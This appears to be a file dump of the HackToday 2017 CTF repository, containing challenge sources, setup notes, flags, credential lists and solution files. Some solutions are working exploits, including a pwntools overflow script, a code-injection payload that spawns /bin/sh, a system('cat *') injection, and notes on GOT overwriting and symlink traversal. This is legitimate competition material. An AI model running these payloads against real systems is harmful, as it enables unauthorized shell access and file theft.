├── 2017-quals ├── cryptography │ ├── init │ ├── cbc │ │ ├── rahasia.py │ │ ├── run.sh │ │ ├── Dockerfile │ │ └── notes.txt │ ├── WutDiHell │ │ ├── SecureChat │ │ │ ├── build_tasks │ │ │ │ ├── api_tasks.js │ │ │ │ ├── app_tasks.js │ │ │ │ └── automation_tasks.js │ │ │ ├── .gitignore │ │ │ ├── bower.json │ │ │ ├── package.json │ │ │ ├── app │ │ │ │ ├── index.html │ │ │ │ ├── scripts │ │ │ │ │ └── format-hex.js │ │ │ │ └── css │ │ │ │ │ └── site.css │ │ │ ├── gulpfile.js │ │ │ └── app.js │ │ ├── flag.enc │ │ ├── README.md │ │ ├── ETA TERANGKANLAH │ │ ├── public │ │ └── generated │ └── circle │ │ ├── README.md │ │ ├── solution.py │ │ └── circle.py ├── exploitation │ ├── init │ ├── mrx │ │ ├── flag │ │ ├── .gdb_history │ │ ├── mrx │ │ ├── README.md │ │ └── mrx.c │ ├── chatbot │ │ ├── flag │ │ ├── chatbot │ │ ├── docker-compose.yml │ │ ├── Dockerfile │ │ └── src │ │ │ └── chatbot.c │ ├── epoch-service │ │ ├── flag │ │ ├── epoch │ │ ├── docker-compose.yml │ │ ├── src │ │ │ ├── epoch.c │ │ │ └── poc.py │ │ └── Dockerfile │ └── turuturu │ │ ├── flag │ │ ├── turuturu │ │ ├── turuturu.gz │ │ ├── docker-compose.yml │ │ ├── Dockerfile │ │ └── src │ │ └── turuturu.c ├── forensics │ ├── init │ ├── dump-incident │ │ ├── flag │ │ ├── README.md │ │ └── access.log.gz │ └── wirelessmouse │ │ ├── flag │ │ ├── remotemouse.pcapng │ │ ├── notes.txt │ │ └── key.txt ├── web-hacking │ ├── init │ ├── comot │ │ ├── src │ │ │ ├── websrc │ │ │ │ ├── report │ │ │ │ │ ├── visit_list │ │ │ │ │ └── rotate.php │ │ │ │ ├── admin │ │ │ │ │ ├── flag │ │ │ │ │ ├── index.php │ │ │ │ │ └── date.php │ │ │ │ └── notes.txt │ │ │ └── botsrc │ │ │ │ ├── comot.sh │ │ │ │ └── comot.py │ │ ├── flag │ │ └── README.md │ ├── where_it_is │ │ ├── flag │ │ ├── requirements.txt │ │ ├── src │ │ │ ├── static │ │ │ │ ├── css │ │ │ │ │ └── flag │ │ │ │ ├── closer.html │ │ │ │ ├── index.html │ │ │ │ └── portal.html │ │ │ ├── templates │ │ │ │ └── 404.html │ │ │ └── main.py │ │ ├── Note │ │ ├── Dockerfile │ │ ├── here │ │ │ 
└── main.py │ │ └── Dockerfile.old │ ├── time_is_money │ │ └── index.php │ └── privilege_escalation │ │ ├── login.php │ │ └── register.php ├── reverse-engineering │ ├── init │ ├── balikin │ │ ├── flag │ │ ├── hasil │ │ ├── balikin.zip │ │ └── main.py │ ├── rennai │ │ ├── flag │ │ ├── rennai │ │ └── rennai.gz │ ├── resqua │ │ ├── resqua │ │ ├── notes.txt │ │ └── resqua.php │ └── webasm │ │ ├── release │ │ └── webasm.wasm │ │ ├── notes.txt │ │ └── src │ │ └── webasm.c ├── easy │ └── index.php └── README.md ├── 2017-finals ├── soal │ ├── cacah_jiwa │ │ ├── README │ │ ├── cacah │ │ ├── cacah.py │ │ ├── cacah.c │ │ ├── Dockerfile │ │ └── docker_build.sh │ ├── math_service │ │ ├── .gdb_history │ │ ├── solusi │ │ ├── description │ │ ├── alfamidi_jackpot │ │ ├── docker_build.sh │ │ ├── Dockerfile │ │ └── math │ ├── howto_blog │ │ ├── challs │ │ │ ├── tests │ │ │ │ ├── _data │ │ │ │ │ └── .gitkeep │ │ │ │ ├── _output │ │ │ │ │ └── .gitignore │ │ │ │ ├── acceptance │ │ │ │ │ ├── _bootstrap.php │ │ │ │ │ ├── AboutCest.php │ │ │ │ │ ├── HomeCest.php │ │ │ │ │ ├── LoginCest.php │ │ │ │ │ └── ContactCest.php │ │ │ │ ├── functional │ │ │ │ │ ├── _bootstrap.php │ │ │ │ │ ├── LoginFormCest.php │ │ │ │ │ └── ContactFormCest.php │ │ │ │ ├── unit │ │ │ │ │ ├── _bootstrap.php │ │ │ │ │ └── models │ │ │ │ │ │ ├── UserTest.php │ │ │ │ │ │ ├── LoginFormTest.php │ │ │ │ │ │ └── ContactFormTest.php │ │ │ │ ├── _bootstrap.php │ │ │ │ ├── unit.suite.yml │ │ │ │ ├── acceptance.suite.yml.example │ │ │ │ ├── functional.suite.yml │ │ │ │ ├── bin │ │ │ │ │ ├── yii.bat │ │ │ │ │ └── yii │ │ │ │ └── _support │ │ │ │ │ ├── FunctionalTester.php │ │ │ │ │ ├── UnitTester.php │ │ │ │ │ └── AcceptanceTester.php │ │ │ ├── robots.txt │ │ │ ├── runtime │ │ │ │ └── .gitignore │ │ │ ├── flag │ │ │ │ └── flag.txt │ │ │ ├── .bowerrc │ │ │ ├── config │ │ │ │ ├── params.php │ │ │ │ ├── test_db.php │ │ │ │ ├── db.php │ │ │ │ ├── console.php │ │ │ │ ├── test.php │ │ │ │ └── web.php │ │ │ ├── favicon.ico │ │ │ ├── 
sqlite │ │ │ │ └── mass.db │ │ │ ├── .htaccess │ │ │ ├── index.php │ │ │ ├── views │ │ │ │ └── site │ │ │ │ │ ├── about.php │ │ │ │ │ ├── error.php │ │ │ │ │ ├── register.php │ │ │ │ │ └── login.php │ │ │ ├── README.md │ │ │ ├── yii.bat │ │ │ ├── yii │ │ │ ├── assets │ │ │ │ └── AppAsset.php │ │ │ ├── .travis.yml │ │ │ ├── mail │ │ │ │ └── layouts │ │ │ │ │ └── html.php │ │ │ ├── commands │ │ │ │ └── HelloController.php │ │ │ ├── codeception.yml │ │ │ ├── models │ │ │ │ ├── UsersDB.php │ │ │ │ ├── LoginForm.php │ │ │ │ └── User.php │ │ │ ├── css │ │ │ │ └── site.css │ │ │ ├── composer.json │ │ │ └── widgets │ │ │ │ └── Alert.php │ │ ├── .bowerrc │ │ ├── challs_description │ │ ├── .htaccess │ │ ├── .travis.yml │ │ └── docker_build.sh │ ├── birthday_card │ │ ├── challs │ │ │ ├── requirements.txt │ │ │ ├── wsgi.py │ │ │ ├── description │ │ │ └── templates │ │ │ │ └── home.html │ │ ├── docker_build.sh │ │ └── Dockerfile │ ├── buaya_lsi │ │ ├── buaya │ │ ├── README │ │ ├── buaya.gambar │ │ ├── docker_build.sh │ │ └── Dockerfile │ ├── musicality_icon │ │ ├── challs │ │ │ ├── config │ │ │ │ └── dbconnection.php │ │ │ ├── sqlite │ │ │ │ └── data.db │ │ │ ├── static │ │ │ │ ├── img │ │ │ │ │ └── default_avatar.png │ │ │ │ ├── vendor │ │ │ │ │ └── inputmask │ │ │ │ │ │ ├── global │ │ │ │ │ │ ├── window.min.js │ │ │ │ │ │ └── document.min.js │ │ │ │ │ │ ├── dependencyLibs │ │ │ │ │ │ ├── inputmask.dependencyLib.jquery.min.js │ │ │ │ │ │ └── inputmask.dependencyLib.jqlite.min.js │ │ │ │ │ │ ├── bindings │ │ │ │ │ │ └── inputmask.binding.min.js │ │ │ │ │ │ ├── jquery.inputmask.min.js │ │ │ │ │ │ ├── inputmask.extensions.min.js │ │ │ │ │ │ └── inputmask.phone.extensions.min.js │ │ │ │ └── css │ │ │ │ │ └── one-page-wonder.css │ │ │ ├── page │ │ │ │ ├── logout.php │ │ │ │ ├── 404.php │ │ │ │ ├── register.php │ │ │ │ ├── login.php │ │ │ │ └── home.php │ │ │ ├── .htaccess │ │ │ ├── README.md │ │ │ ├── index.php │ │ │ └── content │ │ │ │ ├── footer.php │ │ │ │ ├── head.php │ │ │ │ 
└── header.php │ │ ├── challs_description │ │ └── docker_build.sh │ ├── kudanil_lsi │ │ ├── kudanil_lsi │ │ ├── map.solution │ │ ├── map │ │ ├── solution.py │ │ ├── Dockerfile │ │ └── docker_build.sh │ ├── token.list │ ├── name.list │ ├── username.list │ ├── password.list │ ├── sanca │ │ ├── solve.py │ │ ├── sanca │ │ ├── Dockerfile │ │ └── docker_build.sh │ ├── README.md │ ├── gen_creds.sh │ ├── entry_username_password.py │ ├── flag_submit.py │ └── autodeploy.sh ├── bot │ ├── README.md │ ├── run_bot.sh │ ├── bot6.py │ ├── bot3.py │ ├── bot8.py │ ├── bot5.py │ ├── bot2.py │ ├── bot1.py │ ├── bot4.py │ └── bot7.py ├── soal-backup │ ├── permute │ │ ├── Makefile │ │ ├── theflag │ │ ├── permute.h │ │ ├── README │ │ ├── gen.py │ │ └── theflag.c │ └── troll │ │ ├── README.txt │ │ ├── genflag.py │ │ ├── tf.txt │ │ └── troll.txt ├── flag_tester │ ├── start_tpl.sh │ ├── README.md │ ├── test_service_6.py │ ├── test_service_3.py │ ├── test_service_1.py │ ├── test_service_4.py │ ├── test_service_7.py │ └── test_service_8.py └── README.md ├── .gitignore ├── platform-attack-defense ├── bot │ └── README.md ├── deploy-scripts │ └── README.md └── web-platform │ ├── landing.php │ ├── index.php │ ├── README.md │ └── admin.php └── README.md /2017-quals/cryptography/init: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /2017-quals/exploitation/init: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /2017-quals/forensics/init: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /2017-quals/web-hacking/init: -------------------------------------------------------------------------------- 1 | 
-------------------------------------------------------------------------------- /2017-quals/reverse-engineering/init: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /2017-finals/soal/cacah_jiwa/README: -------------------------------------------------------------------------------- 1 | Heap 2 | -------------------------------------------------------------------------------- /2017-finals/soal/math_service/.gdb_history: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | *.csv 2 | *.log 3 | *.list 4 | *.gz 5 | -------------------------------------------------------------------------------- /2017-quals/web-hacking/comot/src/websrc/report/visit_list: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /2017-finals/soal/howto_blog/challs/tests/_data/.gitkeep: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /2017-finals/soal/math_service/solusi: -------------------------------------------------------------------------------- 1 | 5+5 2 | system('cat *')= 3 | -------------------------------------------------------------------------------- /2017-finals/soal/howto_blog/challs/robots.txt: -------------------------------------------------------------------------------- 1 | User-agent: * 2 | Disallow: -------------------------------------------------------------------------------- /2017-finals/soal/howto_blog/challs/runtime/.gitignore: -------------------------------------------------------------------------------- 1 | * 
2 | !.gitignore -------------------------------------------------------------------------------- /2017-finals/soal/howto_blog/challs/tests/_output/.gitignore: -------------------------------------------------------------------------------- 1 | * 2 | !.gitignore -------------------------------------------------------------------------------- /2017-finals/soal/howto_blog/challs/tests/acceptance/_bootstrap.php: -------------------------------------------------------------------------------- 1 | 'admin@example.com', 5 | ]; 6 | -------------------------------------------------------------------------------- /2017-quals/cryptography/WutDiHell/SecureChat/build_tasks/api_tasks.js: -------------------------------------------------------------------------------- 1 | module.exports = function(gulp, plugins, params) { 2 | 3 | } -------------------------------------------------------------------------------- /2017-quals/cryptography/WutDiHell/SecureChat/build_tasks/app_tasks.js: -------------------------------------------------------------------------------- 1 | module.exports = function(gulp, plugins, params) { 2 | 3 | } -------------------------------------------------------------------------------- /2017-finals/soal-backup/permute/theflag: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/grittyninja/HackToday/HEAD/2017-finals/soal-backup/permute/theflag -------------------------------------------------------------------------------- /2017-finals/soal/kudanil_lsi/kudanil_lsi: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/grittyninja/HackToday/HEAD/2017-finals/soal/kudanil_lsi/kudanil_lsi -------------------------------------------------------------------------------- /2017-finals/soal/token.list: -------------------------------------------------------------------------------- 1 | djkrw 2 | bbzne 3 | cugtg 4 | rvegp 5 | vdwpc 6 | meswf 7 | 
xqgdr 8 | mdvwb 9 | ncvoj 10 | tpjtw 11 | -------------------------------------------------------------------------------- /2017-quals/cryptography/WutDiHell/SecureChat/build_tasks/automation_tasks.js: -------------------------------------------------------------------------------- 1 | module.exports = function(gulp, plugins, params) { 2 | 3 | } -------------------------------------------------------------------------------- /2017-quals/exploitation/chatbot/chatbot: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/grittyninja/HackToday/HEAD/2017-quals/exploitation/chatbot/chatbot -------------------------------------------------------------------------------- /platform-attack-defense/web-platform/landing.php: -------------------------------------------------------------------------------- 1 | 5 | 6 |

scoreboard & flag submit form

7 |

8 | -------------------------------------------------------------------------------- /2017-finals/soal/kudanil_lsi/map.solution: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/grittyninja/HackToday/HEAD/2017-finals/soal/kudanil_lsi/map.solution -------------------------------------------------------------------------------- /2017-quals/exploitation/epoch-service/epoch: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/grittyninja/HackToday/HEAD/2017-quals/exploitation/epoch-service/epoch -------------------------------------------------------------------------------- /2017-quals/exploitation/turuturu/turuturu: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/grittyninja/HackToday/HEAD/2017-quals/exploitation/turuturu/turuturu -------------------------------------------------------------------------------- /2017-finals/soal/birthday_card/challs/wsgi.py: -------------------------------------------------------------------------------- 1 | from main import application 2 | 3 | if __name__ =="__main__": 4 | application.run() 5 | 6 | -------------------------------------------------------------------------------- /2017-quals/exploitation/turuturu/turuturu.gz: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/grittyninja/HackToday/HEAD/2017-quals/exploitation/turuturu/turuturu.gz -------------------------------------------------------------------------------- /2017-quals/reverse-engineering/rennai/rennai: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/grittyninja/HackToday/HEAD/2017-quals/reverse-engineering/rennai/rennai -------------------------------------------------------------------------------- /2017-quals/reverse-engineering/resqua/resqua: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/grittyninja/HackToday/HEAD/2017-quals/reverse-engineering/resqua/resqua -------------------------------------------------------------------------------- /2017-finals/soal/howto_blog/challs/favicon.ico: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/grittyninja/HackToday/HEAD/2017-finals/soal/howto_blog/challs/favicon.ico -------------------------------------------------------------------------------- /2017-finals/soal/math_service/alfamidi_jackpot: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/grittyninja/HackToday/HEAD/2017-finals/soal/math_service/alfamidi_jackpot -------------------------------------------------------------------------------- /2017-quals/forensics/dump-incident/access.log.gz: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/grittyninja/HackToday/HEAD/2017-quals/forensics/dump-incident/access.log.gz -------------------------------------------------------------------------------- /2017-quals/reverse-engineering/rennai/rennai.gz: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/grittyninja/HackToday/HEAD/2017-quals/reverse-engineering/rennai/rennai.gz -------------------------------------------------------------------------------- /2017-quals/web-hacking/comot/src/websrc/admin/index.php: -------------------------------------------------------------------------------- 1 |

2 | check server day (admin only): date 3 |

4 | -------------------------------------------------------------------------------- /2017-finals/soal/howto_blog/challs/sqlite/mass.db: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/grittyninja/HackToday/HEAD/2017-finals/soal/howto_blog/challs/sqlite/mass.db -------------------------------------------------------------------------------- /2017-quals/exploitation/mrx/README.md: -------------------------------------------------------------------------------- 1 | - Kesalahan implementasi pada scanf. 2 | - Akibatnya, bisa menimpa apa pun dan mengarahkan GOT ke system('/bin/sh'). 3 | -------------------------------------------------------------------------------- /2017-quals/reverse-engineering/balikin/balikin.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/grittyninja/HackToday/HEAD/2017-quals/reverse-engineering/balikin/balikin.zip -------------------------------------------------------------------------------- /2017-quals/forensics/wirelessmouse/remotemouse.pcapng: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/grittyninja/HackToday/HEAD/2017-quals/forensics/wirelessmouse/remotemouse.pcapng -------------------------------------------------------------------------------- /2017-finals/soal/musicality_icon/challs/sqlite/data.db: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/grittyninja/HackToday/HEAD/2017-finals/soal/musicality_icon/challs/sqlite/data.db -------------------------------------------------------------------------------- /2017-finals/soal/name.list: -------------------------------------------------------------------------------- 1 | Airavata 2 | Petir0x02 3 | OwaOwa 4 | PolyEtherKetone 5 | Tenesys 6 | TydacBerfaedah 7 | JAV 8 | deadf00d 9 | PoKariSup 10 | retasan 11 | 
-------------------------------------------------------------------------------- /2017-quals/reverse-engineering/webasm/release/webasm.wasm: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/grittyninja/HackToday/HEAD/2017-quals/reverse-engineering/webasm/release/webasm.wasm -------------------------------------------------------------------------------- /2017-quals/web-hacking/where_it_is/src/static/css/flag: -------------------------------------------------------------------------------- 1 | saya memberi sebuah portal, dengan nama portal, cobalah kunjungi 2 | 3 | ln -s / portal 4 | 5 | /here/main.py 6 | -------------------------------------------------------------------------------- /2017-finals/soal-backup/troll/README.txt: -------------------------------------------------------------------------------- 1 | untuk generate flag baru: 2 | - edit genflag.py, masukin flag baru 3 | - python genflag.py 4 | - ganti isi index.html dengan tf.txt 5 | -------------------------------------------------------------------------------- /2017-quals/reverse-engineering/webasm/notes.txt: -------------------------------------------------------------------------------- 1 | Host file di dalem folder `release` ke webserver. 2 | Kasih alamatnya di soal. 
3 | 4 | Flag: HackToday{k0pi_nikmat_gak_bikin_kembung} 5 | -------------------------------------------------------------------------------- /2017-finals/soal/username.list: -------------------------------------------------------------------------------- 1 | ddicscovkp 2 | kcpinszofy 3 | wjqmblkshv 4 | zcmwsyerls 5 | eskedtudhe 6 | pchwbcsoir 7 | axtraakhyc 8 | rfqyairhsv 9 | abqveeqxvh 10 | onloabvumk 11 | -------------------------------------------------------------------------------- /2017-quals/cryptography/circle/README.md: -------------------------------------------------------------------------------- 1 | Yang diberikan ke peserta : Hy80o81d9}95{8047Ta887k43c2a dan source codenya. 2 | 3 |

#flag : HackToday{09348789288851074}

4 |

#n = 8

5 | -------------------------------------------------------------------------------- /2017-finals/soal/musicality_icon/challs/static/img/default_avatar.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/grittyninja/HackToday/HEAD/2017-finals/soal/musicality_icon/challs/static/img/default_avatar.png -------------------------------------------------------------------------------- /2017-finals/soal/buaya_lsi/README: -------------------------------------------------------------------------------- 1 | ROP (setresuid bocor) + n_queen 2 | Letakkan binary buaya di server dengan chown user lain (misal user X) 3 | Permission buaya 4755 4 | Permission flag 600 milik user X 5 | -------------------------------------------------------------------------------- /2017-quals/reverse-engineering/resqua/notes.txt: -------------------------------------------------------------------------------- 1 | Host `resqua.php` di sembarang web server, kasih alamatnya di soal. 2 | Kasih binary `resqua` di soal. 3 | 4 | Flag: HackToday{perfect_square_is_perfect} 5 | -------------------------------------------------------------------------------- /2017-quals/cryptography/WutDiHell/flag.enc: -------------------------------------------------------------------------------- 1 | U2FsdGVkX19518OQYHlUgTYuUnOuxXe6x98R2vjoQ7nZ6gE14/I2if3cyamNwZex 2 | Txf1a1989aEHYkyL0Ezj0dgJxZDYPSIpsf9PJXqV7IGsOFC+zJTGdfdDhk7W3oJC 3 | s5WLLjw9JnAt2xfriuD4jw== 4 | -------------------------------------------------------------------------------- /2017-quals/forensics/wirelessmouse/notes.txt: -------------------------------------------------------------------------------- 1 | Kami telah mengintercept koneksi salah satu user http://www.remotemouse.net/. User tersebut menggunakan gadget android untuk mengontrol laptop Windows miliknya. 
2 | -------------------------------------------------------------------------------- /2017-finals/soal/musicality_icon/challs/page/logout.php: -------------------------------------------------------------------------------- 1 | 2 | 3 | flagnya di /flag 4 | 5 | 6 |

7 | One step closer 8 |

9 | 10 | 11 | 12 | 13 | 14 | -------------------------------------------------------------------------------- /2017-quals/cryptography/cbc/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM python:2 2 | 3 | WORKDIR /usr/src/app 4 | 5 | RUN pip install pycrypto 6 | 7 | COPY cbc_server.py . 8 | COPY rahasia.py . 9 | 10 | CMD [ "python", "./cbc_server.py" ] 11 | 12 | -------------------------------------------------------------------------------- /2017-finals/soal/password.list: -------------------------------------------------------------------------------- 1 | lyuvwlxcxdobepp 2 | wimxkbbcumqcsld 3 | czvqiqqhplgampq 4 | qmpxkumvcxjljws 5 | zczotdmaxzsdykt 6 | qzeztkxbgzigskx 7 | hzjjmjwjwjdhxfs 8 | iujdieqauwfhgpn 9 | zhblwomfuxfeddv 10 | pybcrwhrqkwzbqm 11 | -------------------------------------------------------------------------------- /2017-finals/soal-backup/permute/permute.h: -------------------------------------------------------------------------------- 1 | const char *trick_str = "HackToday{xxtHi$_1s_N0t_The_real_Flagxx}"; 2 | int permute[] = {13, 1, 2, 3, 24, 5, 6, 1, 8, 9, 18, 22, 28, 17, 20, 36, 15, 23, 22, 28, 17, 2, 3, 18, 32, 0, 1, 2, 3, 39, -1}; 3 | -------------------------------------------------------------------------------- /2017-quals/cryptography/WutDiHell/SecureChat/.gitignore: -------------------------------------------------------------------------------- 1 | # Npm 2 | node_modules/ 3 | 4 | # Bower 5 | bower_components/ 6 | 7 | # Istanbul 8 | coverage/ 9 | 10 | # Mocha 11 | test_reports/ 12 | 13 | # Build output files 14 | artifacts/ -------------------------------------------------------------------------------- /2017-finals/soal/howto_blog/challs_description: -------------------------------------------------------------------------------- 1 | Pak Agri sedang mengembangkan situs untuk saling berbagi artikel. Untuk saat ini situs tersebut hanya baru memiliki fitur login dan registrasi. 
Daftar di situs tersebut sebagai admin dan dapatkan flag-nya. -------------------------------------------------------------------------------- /2017-finals/soal/birthday_card/challs/description: -------------------------------------------------------------------------------- 1 | # BirthDay Card 2 | 3 | ## Type: Template Injection 4 | 5 | ### Input is evil 6 | 7 | 8 | hint: template / flask 9 | 10 | Source mungkin tidak perlu diberi ke peserta karena straightforward 11 | -------------------------------------------------------------------------------- /2017-finals/soal/howto_blog/challs/tests/_bootstrap.php: -------------------------------------------------------------------------------- 1 | 9 | -------------------------------------------------------------------------------- /2017-quals/web-hacking/where_it_is/src/static/index.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | flagnya di /flag 4 | 5 | 6 |

7 | "Not Found" itu baik 8 |

9 |

10 | tidak perlu tools 11 |

12 | 13 | 14 | 15 | 16 | 17 | -------------------------------------------------------------------------------- /2017-quals/web-hacking/where_it_is/src/static/portal.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | flagnya di /flag 4 | 5 | 6 |

7 | Now you in portal, use it 8 |

9 |

10 | /here/main.py 11 |

12 | 13 | 14 | 15 | 16 | 17 | -------------------------------------------------------------------------------- /2017-quals/web-hacking/where_it_is/Note: -------------------------------------------------------------------------------- 1 | directory traversal 2 | 3 | di test di : 4 | flask 0.12.2 5 | python 3.5 6 | 7 | setup: 8 | masukin environment variable dari FLAG 9 | di folder src/static/css buat link ke / 10 | ln -s / portal 11 | 12 | Need to do: test & hardening 13 | -------------------------------------------------------------------------------- /2017-quals/web-hacking/comot/README.md: -------------------------------------------------------------------------------- 1 | Bot Dependencies: 2 | - phantomjs 3 | - selenium python packages 4 | 5 | Solution: 6 | `` 7 | -------------------------------------------------------------------------------- /2017-finals/soal/kudanil_lsi/map: -------------------------------------------------------------------------------- 1 | h*~*****~**~~~~~~~~ 2 | ~~~~~*~~*~~~~~*~~~~ 3 | *~*~*~~~~***~~*~~*~ 4 | ~~~~~*****~*~~~~~~~ 5 | ~*~~~~~~~***~~*~~** 6 | ~~~*~*~~***~~~~~*~* 7 | ~~~*~**~~~~~~*~~~~~ 8 | ~~~~~*~~~~~~*~~~~~~ 9 | ~~~~~*~*~*~~~~~**~~ 10 | ~*~~*~~~***~~**~*~~ 11 | ~~~*~~~~~*~~/bin/su -------------------------------------------------------------------------------- /2017-quals/easy/index.php: -------------------------------------------------------------------------------- 1 | 11 | -------------------------------------------------------------------------------- /2017-finals/bot/run_bot.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | 3 | nohup python bot1.py & 4 | # nohup python bot2.py & 5 | # nohup python bot3.py & 6 | # nohup python bot4.py & 7 | nohup python bot5.py & 8 | # nohup python bot6.py & 9 | # nohup python bot7.py & 10 | # nohup python bot8.py & 11 | 12 | sleep 99999999999999 -------------------------------------------------------------------------------- 
/2017-quals/cryptography/cbc/notes.txt: -------------------------------------------------------------------------------- 1 | Jalankan `cbc_server.py` (listening di port 9876), bisa diganti portnya di kodingan. 2 | File `rahasia.py` taroh sefolder sama `cbc_server.py`. 3 | 4 | Kasih ke peserta `cbc_server.py` aja, jangan rahasianya. 5 | 6 | Flag: HackToday{flipping_tables_is_better_than_flipping_bits} 7 | 8 | -------------------------------------------------------------------------------- /2017-finals/soal/howto_blog/challs/tests/acceptance/AboutCest.php: -------------------------------------------------------------------------------- 1 | amOnPage(Url::toRoute('/site/about')); 9 | $I->see('About', 'h1'); 10 | } 11 | } 12 | -------------------------------------------------------------------------------- /2017-finals/soal/howto_blog/challs/.htaccess: -------------------------------------------------------------------------------- 1 | Options +FollowSymLinks 2 | IndexIgnore */* 3 | 4 | RewriteEngine on 5 | 6 | # if a directory or a file exists, use it directly 7 | RewriteCond %{REQUEST_FILENAME} !-f 8 | RewriteCond %{REQUEST_FILENAME} !-d 9 | 10 | # otherwise forward it to index.php 11 | RewriteRule . index.php -------------------------------------------------------------------------------- /2017-finals/soal/howto_blog/.htaccess: -------------------------------------------------------------------------------- 1 | Options +FollowSymLinks 2 | IndexIgnore */* 3 | 4 | RewriteEngine on 5 | 6 | # if a directory or a file exists, use it directly 7 | RewriteCond %{REQUEST_FILENAME} !-f 8 | RewriteCond %{REQUEST_FILENAME} !-d 9 | 10 | # otherwise forward it to index.php 11 | RewriteRule . 
index.php -------------------------------------------------------------------------------- /2017-finals/soal/howto_blog/challs/tests/unit.suite.yml: -------------------------------------------------------------------------------- 1 | # Codeception Test Suite Configuration 2 | 3 | # suite for unit (internal) tests. 4 | # RUN `build` COMMAND AFTER ADDING/REMOVING MODULES. 5 | 6 | class_name: UnitTester 7 | modules: 8 | enabled: 9 | - Asserts 10 | - Yii2: 11 | part: [orm, email] -------------------------------------------------------------------------------- /platform-attack-defense/web-platform/index.php: -------------------------------------------------------------------------------- 1 | 4 |

halaman login semua

5 | 6 |
7 | 8 |
9 | 10 |
11 | 12 | 13 |
14 | 15 | 16 | -------------------------------------------------------------------------------- /2017-finals/soal-backup/permute/README: -------------------------------------------------------------------------------- 1 | Ini soalnya cuma file: theflag (cuma ini yg diberikan ke peserta) 2 | 3 | sisanya source code, siapa tau mau dicompile buat platform lain atau mau diganti flagnya 4 | 5 | untuk ganti flag: 6 | - edit file gen.py ganti flag tipuan dan flag benerannya 7 | - python gen.py > permute.h 8 | - make 9 | 10 | 11 | -------------------------------------------------------------------------------- /2017-finals/soal/musicality_icon/challs/.htaccess: -------------------------------------------------------------------------------- 1 | 2 | Options +FollowSymLinks 3 | Options -Indexes 4 | 5 | RewriteEngine On 6 | 7 | RewriteCond %{REQUEST_FILENAME} !-f 8 | RewriteCond %{REQUEST_FILENAME} !-d 9 | RewriteRule ^([0-9a-zA-Z\-]*)$ index.php?p=$1 [QSA,L] 10 | 11 | ErrorDocument 404 /404 12 | -------------------------------------------------------------------------------- /2017-finals/soal/cacah_jiwa/cacah.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | from pwn import * 4 | 5 | context(arch='i386', bits=32, os='linux') 6 | a = process('./cacah') 7 | 8 | print a.recvuntil('Nama suami : ') 9 | a.sendline('a'*16 + p32(0x0804a010)) 10 | 11 | print a.recvuntil('Nama istri : ') 12 | a.sendline(p32(0x08048598)) 13 | 14 | a.interactive() 15 | -------------------------------------------------------------------------------- /2017-finals/soal/howto_blog/challs/tests/acceptance.suite.yml.example: -------------------------------------------------------------------------------- 1 | class_name: AcceptanceTester 2 | modules: 3 | enabled: 4 | - WebDriver: 5 | url: http://127.0.0.1:8080/ 6 | browser: firefox 7 | - Yii2: 8 | part: orm 9 | entryScript: index-test.php 10 | cleanup: false 11 | 
-------------------------------------------------------------------------------- /2017-finals/soal/musicality_icon/challs_description: -------------------------------------------------------------------------------- 1 | Mz Djent adalah seorang pemusik dan programmer. Ia kini sedang mengembangkan situs untuk saling berbagi karya musik. Saat ini situs tersebut sudah dapat melakukan login dan registrasi. Ia mengimplementasikan fitur untuk mengunggah avatar/gambar profil melalui URL. Daftar di situs tersebut dan cari cara untuk mendapatkan flag-nya. -------------------------------------------------------------------------------- /2017-finals/soal/sanca/solve.py: -------------------------------------------------------------------------------- 1 | def unicode_escape(s): 2 | res = '' 3 | for c in s: 4 | res += '\\'+oct(ord(c)).lstrip("0").zfill(3) 5 | return res 6 | 7 | payload = '__import__("os").system("/bin/sh")' 8 | payload = unicode_escape(payload) 9 | print "# Encoding: Unicode_Escape \r" + payload 10 | 11 | #howtouse: (python solve.py;cat -) | nc ip port -------------------------------------------------------------------------------- /2017-quals/cryptography/WutDiHell/ETA TERANGKANLAH: -------------------------------------------------------------------------------- 1 | USE SECRET TO DECRYPT THE FILE 2 | ============================================================== 3 | Encrypt 4 | openssl aes-256-cbc -a -in flag -out flag.enc 5 | ============================================================== 6 | Decrypt 7 | openssl aes-256-cbc -a -d -in flag.enc -out flag 8 | ============================================================== -------------------------------------------------------------------------------- /2017-finals/soal/README.md: -------------------------------------------------------------------------------- 1 | ## TESTING JOURNEY 2 | 3 | | NAMA SOAL | STATUS | 4 | |--- |--- | 5 | | birthday_card | TESTED | 6 | | buaya_lsi | TESTED | 7 | | cacah_jiwa | X | 8 | | 
